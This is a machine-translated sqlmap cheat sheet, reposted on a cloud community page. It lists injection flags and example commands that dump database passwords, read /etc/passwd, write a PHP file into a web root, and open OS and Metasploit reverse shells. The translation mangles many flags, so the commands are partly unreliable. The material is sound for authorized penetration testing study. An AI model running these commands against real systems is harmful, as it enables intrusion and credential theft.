Sqlmap using Notes

Source: Internet
Author: User

Favorite: Http://www.91ri.org/3364.html

Source: 91Ri

Easy access to the previous collation has the wrong point of Note: The text part is-not-(this is not I do not want to modify, but the problem of the site system, I am sorry, please make a copy of the statement after the manual modification.) :) )

-U #注入点
-F #指纹判别数据库类型
-B #获取数据库版本信息
-P #指定可测试的参数 (? page=1&id=2-p "Page,id")
-D "" #指定数据库名
-T "" #指定表名
-C "" #指定字段
-S "" #保存注入过程到一个文件, also can be interrupted, next recovery in injection (Save:-S "xx.log" recovery:-S "Xx.log" –resume)
–columns #列出字段
–current-user #获取当前用户名称
–current-db #获取当前数据库名称
–users #列数据库所有用户
–passwords #数据库用户所有密码
–privileges #查看用户权限 (–privileges-u root)
-U #指定数据库用户
–dbs #列出所有数据库
–tables-d "" #列出指定数据库中的表
–columns-t "User"-D "MySQL" #列出mysql数据库中的user表的所有字段
–dump-all #列出所有数据库所有表
–exclude-sysdbs #只列出用户自己新建的数据库和表
–dump-t ""-D ""-C "" #列出指定数据库的表的字段的数据 (–dump-t users-d master-c surname)
–dump-t ""-D "" –start 2–top 4 # Lists data for 2-4 fields of tables in the specified database
–dbms #指定数据库 (mysql,oracle,postgresql,microsoft SQL server,microsoft access,sqlite,firebird,sybase,sap MaxDB)
–os #指定系统 (linux,windows)
-V #详细的等级 (0-6)
0: Only python backtracking, errors, and critical messages are displayed.
1: Displays information and warning messages.
2: Display debug message.
3: Payload injection.
4: The HTTP request is displayed.
5: The HTTP response header is displayed.
6: Display the contents of the HTTP response page
–privileges #查看权限
–IS-DBA #是否是数据库管理员
–roles #枚举数据库用户角色
–udf-inject #导入用户自定义函数 (Get system permissions)
–union-check #是否支持union Injection
–union-cols #union query Table records
–union-test #union Statement Test
–union-use #采用union Injection
–union-tech #union配合order by
–method "POST" –data "" #POST方式提交数据 (–method "POST" –data "Page=1&id=2″)
–cookie "use; separate" #cookie注入 (–cookies= "phpsessid=mvijocbglq6pi463rlgk1e4v52; Security=low")
–referer "" #使用referer欺骗 (–referer "http://www.baidu.com")
–user-agent "" #自定义user-agent
–proxy "Http://127.0.0.1:8118″ #代理注入
–string "" #指定关键词
–threads #采用多线程 (–threads 3)
–sql-shell #执行指定sql命令
–sql-query #执行指定的sql语句 (–sql-query "Select password from mysql.user WHERE user = ' root ' LIMIT 0, 1″)
–file-read #读取指定文件
–file-write #写入本地文件 (–file-write/test/test.txt–file-dest/var/www/html/1.txt; writes the local test.txt file to the target 1.txt)
–file-dest #要写入的文件绝对路径
–os-cmd=id #执行系统命令
–os-shell #系统交互shell
–os-pwn #反弹shell (–os-pwn–msf-path=/opt/framework/msf3/)
–msf-path= #matesploit绝对路径 (–msf-path=/opt/framework/msf3/)
–os-smbrelay #
–OS-BOF #
–reg-read #读取win系统注册表
–PRIV-ESC #
–time-sec= #延迟设置 Default –time-sec=5 is 5 seconds
-P "user-agent" –user-agent "Sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" #指定user-agent Injection
–eta #盲注
/pentest/database/sqlmap/txt/
Common-columns.txt Field Dictionary
Common-outputs.txt
Common-tables.txt Table Dictionary
Keywords.txt
Oracle-default-passwords.txt
User-agents.txt
Wordlist.txt
Common statements
1.
./sqlmap.py-u http://www.91ri.org/test.php?p=2-f-b–current-user–current-db–users–passwords–dbs-v 0
2.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–passwords-u Root–union-use-v 2
3.
./sqlmap.py-u http://www.91ri.org/test.php?p=2-b–dump-t users-c username-d userdb–start 2–stop 3-v 2
4.
./sqlmap.py-u http://www.91ri.org/test.php?p=2-b–dump-c "User,pass"-V 1–exclude-sysdbs
5.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–sql-shell-v 2
6.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–file-read "C:\Boot.ini"-V 2
7.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–file-write/test/test.txt–file-dest/var/www/html/1.txt-v 2
8.
./sqlmap.py-u http://www.91ri.org/test.php?p=2-b–os-cmd "id"-V 1
9.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–os-shell–union-use-v 2
10.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–os-pwn–msf-path=/opt/framework/msf3–priv-esc-v 1
11.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–os-pwn–msf-path=/opt/framework/msf3-v 1
12.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–os-bof–msf-path=/opt/framework/msf3-v 1
13.
./sqlmap.py-u http://www.91ri.org/test.php?p=2–reg-add–reg-key= "Hkey_local_nachine\sofeware\sqlmap" –reg-value= Test–reg-type=reg_sz–reg-data=1
14.
./sqlmap.py-u Http://www.91ri.org/test.php?p=2-b–eta
15.
./sqlmap.py-u "Http://www.91ri.org/sqlmap/mysql/get_str_brackets.php?id=1″-p id–prefix" ') "–suffix" and (' abc ' = ' abc ”
16.
./sqlmap.py-u "Http://www.91ri.org/sqlmap/mysql/basic/get_int.php?id=1″–auth-type basic–auth-cred" TestUser: Testpass "
17.
./sqlmap.py-l burp.log–scope= "(www)? \.target\. (com|net|org) "
18.
./sqlmap.py-u "Http://www.91ri.org/sqlmap/mysql/get_int.php?id=1″–tamper tamper/between.py,tamper/randomcase.py, Tamper/space2comment.py-v 3
19.
./sqlmap.py-u "Http://www.91ri.org/sqlmap/mssql/get_int.php?id=1″–sql-query" select ' foo ' "-V 1
20.
./sqlmap.py-u "Http://www.91ri.org/mysql/get_int_4.php?id=1″–common-tables-d Testdb–banner

A simple injection process
1. Read the database version, current user, current database
Sqlmap-u http://www.91ri.org/test.php?p=2-f-b–current-user–current-db-v 1
2. Determine current database user rights
Sqlmap-u http://www.91ri.org/test.php?p=2–privileges-u User name-V 1
Sqlmap-u http://www.91ri.org/test.php?p=2–is-dba-u User name-V 1
3. Read the password of all database users or specified database users
Sqlmap-u Http://www.91ri.org/test.php?p=2–users–passwords-v 2
Sqlmap-u http://www.91ri.org/test.php?p=2–passwords-u root-v 2
4. Get all databases
Sqlmap-u Http://www.91ri.org/test.php?p=2–dbs-v 2
5. Get all tables in the specified database
Sqlmap-u http://www.91ri.org/test.php?p=2–tables-d mysql-v 2
6. Gets the field of the specified table in the specified database name
Sqlmap-u http://www.91ri.org/test.php?p=2–columns-d mysql-t users-v 2
7. Gets the data for the specified field in the specified table in the specified database name
Sqlmap-u http://www.91ri.org/test.php?p=2–dump-d mysql-t users-c "Username,password"-S "sqlnmapdb.log"-V 2
8.file-read reading Web files
Sqlmap-u http://www.91ri.org/test.php?p=2–file-read "/etc/passwd"-V 2
9.file-write writing files to the Web
Sqlmap-u Http://www.91ri.org/test.php?p=2–file-write/localhost/mm.php–file-dest/var/www/html/xx.php-v 2

This article is transferred from BUGCX Blog by the network Security and Defense Research Laboratory (www.91ri.org) Information security team to collect and collate.

Sqlmap using Notes

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.